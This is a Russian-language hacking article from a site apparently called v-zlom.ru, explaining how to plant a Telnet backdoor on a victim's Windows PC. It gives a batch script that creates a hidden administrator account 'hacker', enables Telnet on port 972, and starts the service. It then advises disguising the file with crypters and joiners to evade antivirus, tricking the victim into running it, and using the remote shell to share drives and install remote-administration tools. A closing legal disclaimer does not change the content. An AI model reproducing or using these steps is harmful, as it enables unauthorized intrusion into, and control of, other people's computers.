V-zlom.ru » Статьи » Запуск TELNET на чужом компьютере

Запуск TELNET на чужом компьютере

chcp 1251

net user SUPPORT_388945a0 /delete

net user hacker hack /add

net localgroup Администраторы hacker /add

net localgroup Пользователи SUPPORT_388945a0 /del

regedit /s conf.reg

sc config tlntsvr start= auto

tlntadmn config port=972 sec=-NTLM

net start Telnet \сохраняем в bat\\

 

 

 

Теперь пояснения:

chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.

net user SUPPORT_388945a0 /delete и

net localgroup Пользователи SUPPORT_388945a0 /del - удаляют стандартную 

первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.

net user hacker hack /add и

net localgroup Администраторы hacker /add - не трудно догадаться, что этими 

командами создаётся новая учетная запись с админскими правами, 

где логин: hacker

пасс: hack

Так как при создании нового админа он будет виден в welcome screen'е, отключить его 

можно импортировав

рег файл в реестр, следующего содержания:

Содержимое conf.re

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows 

NTCurrentVersionWinlogonSpecialAccountsUserLis t]

"hacker"=dword:00000000

Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start= 

auto которая

меняет тип его запуска на автоматический(по дефолту disabled ).

При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это 

палевно, поэтому советую прописывать этой командой tlntadmn config port=972 

sec=-NTLM , редко используемый порт. В нашем случае это 972.

Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet 

окончательно запустит наш бэкдор.

 

теперь проверим правильный ли синтаксис кода. Открываем командную строку, если 

она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код, 

запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так: 

Пуск -> Выполнить -> пишем services.msc -> Ok 

Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и 

смотришь её свойства. При необходимости в любой момент можно её отключить.

 

Вот батник готов, и как ты видишь он слишком палевны, при его запуске вылетает 

консольное черное окно, говорящее о выполняемых процессах в командной строке. Но 

не все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler http://ifolder.ru/7197807. Она 

компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник 

превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле. 

Вроде готово... Но не совсем, ты же не будешь дарить пустой экзешник, поэтому 

бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно 

скачать тут http://ifolder.ru/7198272 pohernah107(13 кб) а джойнер можешь взять здесь http://ifolder.ru/7197872 

RedBindeR_v1.3_Mod(460 кб) . Они помогут тебе склеить файлы в один и изменить 

сигнатуру дабы не палится антивирусами. 

Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы 

тебе осталось только подключится к телнету через указанный тобой порт. Бывает 

так что жертва находится в глобальной сети www у которой IP динамический, в этом 

случаи, зная диапазон IP его провайдера можно просканировать эту сеть на 

открытый наш редко используемый 972 Порт. А чтобы знать когда твой "друг" 

в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент.

Осталось подключится. Для этого можешь выбрать стандартный виндосовский 

клиент который находится тут c:WINDOWSsystem32telnet.exe. 

Запускаешь. Пишешь:

Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]

если пишет:

Welcome to Microsoft Telnet Service

login:_

то всё акей =))

Вводишь:

login: hacker

password: hack

Появляется надпись:

*=====================================================

Вас приветствует Telnet-сервер производства корпорации Майкрософт

*=====================================================

C:>_

 

Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь 

управлять кампом, отдавая команды...

Можно к примеру расшарить диски:

 

C:>net share disk_c=c: > nul

C:>net share disk_d=d: > nul

C:>net share disk_e=e: > nul

 

перезагрузить комп:

C:>shutdown -r -t 1 -c -f

 

прописать какой-нибудь ключ реестра:

C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v 

DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему

 

или поднять ftp сервер и залить радмина для более удобного удаленного 

администрирования:

C:>ftp 

В общем-то, здесь уже играет фантазия взломщика =)

 

Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.

 

P.S. На все непонятные термины и выражения есть Гугл. 

 

Внимание!!! Данная статья - это не побуждение к действию, все описанное здесь 

попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей 

информационной безопасности

 

  • Автор: admin
  • Комментарии: 0
  • Просмотры: 2363
0

Добавить комментарий

Вы не авторизованы и вам запрещено писать комментарии. Для расширенных возможностей зарегистрируйтесь!